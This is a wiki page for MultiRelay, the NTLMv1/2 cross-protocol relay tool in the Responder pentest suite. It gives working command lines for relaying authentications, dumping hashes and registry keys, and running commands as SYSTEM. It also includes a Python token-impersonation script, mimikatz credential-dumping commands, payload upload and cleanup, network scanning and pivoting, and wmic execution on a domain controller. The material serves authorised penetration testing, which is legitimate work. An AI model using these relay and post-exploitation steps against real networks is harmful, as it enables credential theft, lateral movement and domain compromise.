3 MultiRelay

lgandx edited this page 2021-04-21 17:08:13 -03:00

Table of Contents

• Responder MultiRelay: Cross-protocol NTLMv1/2 Relay
• MultiRelay Description:
• Usage Overview:
• Running The Tool, The Common Scenario:
• MultiRelay Advanced Usage
• Good Things To Know:
• NTLM Relay Lateral Movement:
• MultiRelay 2.0 Wushu:

Responder MultiRelay: Cross-protocol NTLMv1/2 Relay

MultiRelay is a cross-protocol NTLMv1/2 relay tool located in the Responder/tools/ folder.

MultiRelay Description:

MultiRelay is a powerful pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target.

Currently MultiRelay relays HTTP, WebDav, Proxy and SMB authentications to an SMB server. This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.

Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:

• Remotely dump the LM and NT hashes on the target.

• Remotely dump any registry keys under HKLM.

• Read any file on the target.

• Download any file on the target.

• Execute any command as System on the target.

Usage Overview:

Most of the time, MultiRelay can be run with the following options:

./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin

MultiRelay comes with a set of 5 options:

-p: Add an extra listening port for HTTP, WebDav, Proxy requests to relay.

-u: A list of users to relay. -u can also be set to "ALL" to target all users.

-t: The target

-c: Single command to run (scripting)

-d: Dump hashes (scripting)

MultiRelay will start by fingerprinting your target and tell you if SMB Signing is mandatory and if so, will let you know that you should target another server.

Another useful utility included in Responder's tools folder is RunFinger.py. RunFinger accepts a single IP address or a class C range and will tell you the following for a given target:

• Os version

• Domain joined

• Signing is mandatory or not.

RunFinger can dump this information in a grepable format by using the -g command line switch:

root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24

Wich will output something like:

[SMB2]:['192.168.0.136', Os:'Windows 8.1/Server 2012R2', Build:'9600', Domain:'SMB1', Bootime: 'Last restart: 2021-04-20 12:37:56', Signing:'False', RDP:'False', SMB1:'Enabled']
[SMB1]:['192.168.0.218', Os:'Windows 5.1', Domain:'SMB1', Signing:'False', Null Session: 'True', RDP:'False']
[SMB1]:['192.168.0.251', Os:'Windows Server 2003 3790 Service Pack 1', Domain:'SMB1', Signing:'True', Null Session: 'True', RDP:'False']
[SMB2]:['192.168.0.253', Os:'Windows 10/Server 2016/2019 (check build)', Build:'17763', Domain:'SMB3', Bootime: 'Unknown', Signing:'True', RDP:'False', SMB1:'Disabled']

This utility is useful for mapping networks and to carefully select a target.

Running The Tool, The Common Scenario:

MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is:

• Set SMB and HTTP to Off in Responder.conf

./Responder.py -I eth0 -rv on one screen

./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount OtherAdmin on another one.

In this scenario all NBT-NS, LLMNR lookups will be resolved with Responder.py to our IP address, MultiRelay will be listening on TCP port 80, 3128, 445 and will be waiting for incoming connections.

Once a connection is received, MultiRelay will be parsing all authentication requests and will verify if:

• The user authentication is allowed to be relayed on the target.

• This user has already been relayed to our target and if the server returned a logon failure.

If this user was previously relayed and the server returned a logon failure, this user will be blacklisted for further authentication.

This is done to prevent account lockouts. This check can be reset by deleting the SMBRelay-Session.txt file in Responder logs folder.

Even if a user is not allowed to be relayed, his NTLMv1/v2 sets of credentials will be captured and stored in Responder logs folder as "SMB-Relay-CLIENTIP.txt", so you won't lose any hashes while running MultiRelay.py.

MultiRelay Advanced Usage

MultiRelay allows you to:

• Upload a file on the target: Using the "upload" command, a user can push any file using the SMB protocol on the compromised target. The file will be uploaded in c:\Windows\Temp\

• Delete a file on the target: Using the "delete" command, a user can delete any file using the SMB protocol on the compromised target. If the file has been successfully deleted, no errors will be shown.

• Run a command as the currently logged in user: Using the "runas" command, a user will be able to launch a service which will run a command as the currently logged in user.

• Pivot to another host, using the currently logged in user's sets of credentials. Using the "pivot" command, a user will attempt to propagate to another host (Lateral movement).

• Run remote Mimikatz (32-bit, 64-bit) RPC commands: Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.

• Scan the current /24 or /16 in order to find other hosts to pivot to: When using the "scan /24" command, a user will be able to scan the entire class C and chose another host to pivot to.

• Run a local command on the local system: Any other command will launch a service which will run a command as LocalSystem.

Good Things To Know:

• All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/

• Filenames for these binaries are specified in MultiRelay.py, starting at line 48:

  • MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"
  • Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
  • RunAsFileName = "./MultiRelay/bin/Runas.exe"
  • SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"

• Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py. The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.

• If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$

• Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging and you wont be able to delete the file unless you're using taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section.

NTLM Relay Lateral Movement:

MultiRelay philosophy is that any successful NTLM Relay is precious and everything should be done to keep that SMB connection alive.

Getting command execution via NTLM Relay is commonly achieved via SVCCTL:

Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.

While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account. This limits the compromise to only one host at the time, and you might wait a long time before another administrator hash flies over the wire... While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a 5 lines python script (Runas.py) which impersonate a logged in user:

import sys, win32ts, win32process, win32con

SessionID = win32ts.WTSGetActiveConsoleSessionId()
UserToken = win32ts.WTSQueryUserToken(SessionID)
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())

As stated in WTSGetActiveConsoleSessionId MSDN documentation WTSGetActiveConsoleSessionId

"Retrieves the session identifier of the console session. The console session is the session that is currently attached to the physical console. Note that it is not necessary that Remote Desktop Services be running for this function to succeed".

Once we have the session ID, we use the WTSQueryUserToken function to retrieve the Token associated with the previously acquired Session ID, and call CreateProcessAsUser with our command.

In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind NTLM Relay attack vector: Propagation and mass compromises resulting from 1 relayed authentication.

MultiRelay 2.0 Wushu:

Below are listed some post exploitation attack examples:

• Mimikatz RPC:

  • Get all available token, impersonate one user and run a command as this user:

    • C:\Windows\system32:#mimi token::list
    • C:\Windows\system32:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run
    • C:\Windows\system32:#mimi token::run /user:Administrator /process:whoami

  • Get all logon passwords:

    • mimi sekurlsa::logonpasswords

  • Etc, all regular mimikatz commands are available on the RPC interface

  • Upload your custom mimikatz or payload and run it:

    • C:\Windows\system32:#upload path/to/mimikatz.exe
    • C:\Windows\system32:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit

  • The exit command is very important with mimikatz, if you don't use it mimikatz will stay loaded and the command will fail.

  • Note: If you need to run your executable as the currently logged in user, use:

    • C:\Windows\system32:#runas %windir%\Temp\Filename.exe args

  • Now delete the file:

    • C:\Windows\system32:#delete /Windows/Temp/mimikatz.exe

• Scan the current class C and pivot to another host: C:\Windows\system32:#scan /24

        ...[snip]...
    [SMB2]:['192.168.0.136', Os:'Windows 8.1/Server 2012R2', Build:'9600', Domain:'SMB1', Bootime: 'Last restart: 2021-04-20 12:37:56', Signing:'False', RDP:'False', SMB1:'Enabled']
    [SMB1]:['192.168.0.218', Os:'Windows 5.1', Domain:'SMB1', Signing:'False', Null Session: 'True', RDP:'False']
    [SMB1]:['192.168.0.251', Os:'Windows Server 2003 3790 Service Pack 1', Domain:'SMB1', Signing:'True', Null Session: 'True', RDP:'False']
    [SMB2]:['192.168.0.253', Os:'Windows 10/Server 2016/2019 (check build)', Build:'17763', Domain:'SMB3', Bootime: 'Unknown', Signing:'True', RDP:'False', SMB1:'Disabled']
  
        ...[snip]...
  
     C:\Windows\system32\:#pivot 192.168.1.145
  
        [+] Pivoting to 192.168.1.145.
        Connected to 192.168.1.145 as LocalSystem.
  

• Run a command as the currently logged in user: C:\Windows\system32:#runas whoami

        smb3\lgandx 
  

• Execute commands on the PDC remotely and read the output:

Mount the PDC C:\ drive: C:\Windows\system32:#runas net use g: \smb3.local\c$

        The command completed successfully.

    C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"

        Executing (Win32_Process)->Create()
        Method execution successful.
        Out Parameters:
        instance of __PARAMETERS
        {
        ProcessId = 1068;
        ReturnValue = 0;
        };

    Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt
    C:\Windows\system32\:#runas more g:\results.txt

        smb3\lgandx 

These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment, for the rest it's up to your imagination.